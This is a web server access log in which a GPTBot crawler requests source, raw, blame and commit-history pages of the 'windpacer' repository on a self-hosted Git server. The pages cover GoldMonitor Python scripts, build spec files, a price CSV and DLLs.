git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19857] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20871] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12355] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18553] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18000] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12326] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12354] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19068] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:14:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21346] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11485] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11454] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11485] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12402] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22905] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20788] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10969] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12400] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12597] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:14:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9875] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12330] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11584] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22150] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11582] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9874] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11459] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12270] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10125] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" -[17/Feb/2026:14:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 